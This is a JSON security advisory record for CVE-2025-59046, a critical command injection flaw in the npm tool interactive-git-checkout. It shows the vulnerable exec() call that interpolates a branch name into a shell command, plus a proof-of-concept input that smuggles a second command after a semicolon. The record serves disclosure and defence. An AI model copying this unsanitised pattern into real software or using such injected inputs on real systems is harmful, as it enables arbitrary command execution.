{"id":"CVE-2025-59046","aliases":["GHSA-4wcm-7hjf-6xw5"],"url":"https://o3.security/vulnerability/CVE-2025-59046","summary":"interactive-git-checkout has Command Injection vulnerability","details":"The npm package `interactive-git-checkout` is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via `npm install -g interactive-git-checkout`.\n\nResources: \n * Project's npm package: https://www.npmjs.com/package/interactive-git-checkout\n \n## Command Injection Vulnerability\n\nThe `interactive-git-checkout` tool is vulnerable to a command injection vulnerability because it passes the branch name to the `git checkout` command using the Node.js child process module's `exec()` function without proper input validation or sanitization.\n\nThe following vulnerable code snippets demonstrates the issue:\n\n```js\nconst { exec: execCb } = require('child_process');\nconst { promisify } = require('util');\n\nconst exec = promisify(execCb);\n\nmodule.exports = async (targetBranch) => {\n    const { stdout, stderr } = await exec(`git checkout ${targetBranch}`);\n    process.stderr.write(stderr);\n    process.stdout.write(stdout);\n};\n```\n\n## Exploit Proof of Concept\n\n1. Install the `interactive-git-checkout` package (as suggested by the package's README):\n\n```bash\nnpm install --global interactive-git-checkout\n```\n\n2. Run the executable exposed by the installed package:\n\n```bash\n$ igc\n```\n\n3. When prompted, enter the following branch name:\n\n```bash\nhello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; #\n```\n\n## Vulnerable versions\n\nAll versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of `1.1.4`.\n\n# Author\n\nLiran Tal","published":"2025-09-09T22:33:31.580Z","modified":"2026-08-12T03:51:13.710135111Z","cvss":{"score":9.8,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},"epss":null,"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"npm","name":"interactive-git-checkout","fixedVersion":null}],"fix":{"url":"https://github.com/ninofiliu/interactive-git-checkout/commit/8dd832dd302af287a61611f4f85e157cd1c6bb41","label":"ninofiliu/interactive-git-checkout@8dd832d"},"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/59xxx/CVE-2025-59046.json"},{"type":"ADVISORY","url":"https://github.com/ninofiliu/interactive-git-checkout/security/advisories/GHSA-4wcm-7hjf-6xw5"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-59046"},{"type":"FIX","url":"https://github.com/ninofiliu/interactive-git-checkout/commit/8dd832dd302af287a61611f4f85e157cd1c6bb41"},{"type":"PACKAGE","url":"https://github.com/ninofiliu/interactive-git-checkout"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:13.710135111Z"}}